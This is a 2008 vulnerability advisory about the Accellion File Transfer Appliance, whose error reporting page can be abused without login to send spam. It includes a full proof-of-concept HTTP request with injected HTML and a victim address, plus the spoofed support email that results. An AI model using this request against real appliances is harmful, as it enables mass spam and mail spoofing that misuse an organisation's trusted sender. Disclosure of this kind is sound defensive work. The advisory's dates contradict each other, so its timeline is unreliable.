Title: Accellion File Transfer - SPAM Engine Vulnerabilities
Criticality: High (3/3)
Affected software: Accellion File Transfer FTA_7_0_178
Author: Eric BEAULIEU, eric.beaulieu \[at\] zebux.org, http:\\www.zebux.org
Discovery Date: 20-08-2008
Issue solved: 18-08-2008
Location URL: http://www.zebux.org/pub/Advisory/Advisory_Accellion_SPAM_Engine_Vulnerability_200808.txt
Summary
-------
Accellion File Transfer Appliance is prone to a vulnerability that can be exploited, without any authentication, by malicious remote people to conduct a SPAM attack.
Description
-----------
A vulnerability has been discovered in Accelion "error reporting page", which could be exploited to send mass mailing to internal or external email address. The error reporting page is used to informed Accellion administrator and Accellion support that there is a problem on the appliance (for example to inform that an URL doesn't exist). Users have an interface to describe the problem and set his email address to receive a message with an Accellion support ticket ID.
But if a malicious user add, with the ID error reference (in the URL address bar), a message, he will received the ticket ID and the message text. So malicious people could use this URL address to send external and internal mass mailing (because Accellion appliance is always allowed to send external and internal on SMTP infrastructure).
Example:
To exploit this vulnerability, you have to forge a malicious HTTP request (for example with Firefox module: Live HTTP Headers):
URL:
https://[Accelion web server]/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1>
HTTP HEADER:
Host: [Accelion web server]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://[Accelion web server]/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1>
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
POST DATA:
description=Could+you+please+close+this+tickets%0D%0A%0D%0ARegards&client_email=email_to_spam%40victim_domain.com&submit=Soumettre+le+rapport
Malicious message will be :
From : support@accellion.com [mailto:support@accellion.com]
À : email_to_spam@victim_domain.com
Objet : API Error Report: 1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1>
Hi email_to_spam,
Error ID 1002K725PI-888-100Test_SPAM
SPAM_ATTACK
Timestamp 2008-08-19 08:20:53 GMT
This email has been sent to you for your own reference.
We will attend to this error report as soon as possible.
Thank you for using Secure File Transfer.
________________________________________
Accellion Pte Ltd
http://www.accellion.com
Solution
--------
Upgrade to version FTA_7_0_189
Workaround
----------
There is not workaround.
References
----------
FrSIRT Advisory:
Bugtraq ID: 31178
Websense Advisory URL:
Secunia Advisory ID: SA31848
CVE ID:
Security Tracker: 1020870
Timeline
--------
20-08-2008 - Vulnerability was been discovered
21-08-2008 - Vulnerability reported to vendor
22-08-2008 - Vendor informed the stat of fix process
28-08-2006 - Vendor published the new version and contact Accellion customers
Revision history
----------------
18-08-2008 - 1.0 - Advisory written